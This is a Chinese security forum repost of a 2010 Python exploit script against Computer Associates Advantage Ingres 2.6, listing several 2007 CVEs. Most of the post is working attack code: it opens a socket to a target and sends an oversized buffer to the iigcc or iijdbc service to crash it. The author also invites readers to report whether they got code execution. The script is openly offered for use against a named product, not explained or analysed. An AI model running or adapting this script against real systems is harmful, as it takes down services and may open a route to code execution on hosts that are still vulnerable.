首页
社区
课程
招聘
[转帖]Computer Associates Advantage Ingres 2.6 Denial of Service Vulnerabilities
2010-8-15 17:00 2902

[转帖]Computer Associates Advantage Ingres 2.6 Denial of Service Vulnerabilities

2010-8-15 17:00
2902
# Exploit Title: Computer Associates Advantage Ingres 2.6 Denial of Service Vulnerabilities  

# Date: 2010-08-14  

# Author: fdisk  

# Version: 2.6  

# Tested on: Windows 2003 Server SP1 en  

# CVE:  CVE-2007-3334 - CVE-2007-3336 - CVE-2007-3337 - CVE-2007-3338  

# Notes: Fixed in the last version.  

# please let me know if you are/were able to get code execution <rr dot fdisk at gmail dot com>  

   

import socket  

import sys  

   

if len(sys.argv) != 4:  

    print "Usage: ./CAAdvantageDoS.py <Target IP> <Port> <Service>"

    print "Vulnerable Services: iigcc, iijdbc"

    sys.exit(1)  

   

host = sys.argv[1]  

port = int(sys.argv[2])  

service = sys.argv[3]  

   

if service == "iigcc":  

        payload = "\x41" * 2106

elif service == "iijdbc":  

        payload = "\x41" * 1066

else:  

        print "Vulnerable Services: iigcc, iijdbc"

        sys.exit(1)  

   

payload += "\x42" * 4

   

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  

s.connect((host, port))  

print "Sending payload"

s.send(payload)  

data = s.recv(1024)  

s.close()  

print 'Received', repr(data)  

   

print service + " crashed"

[CTF入门培训]顶尖高校博士及硕士团队亲授《30小时教你玩转CTF》,视频+靶场+题目!助力进入CTF世界

收藏
点赞0
打赏
分享
最新回复 (0)
游客
登录 | 注册 方可回帖
返回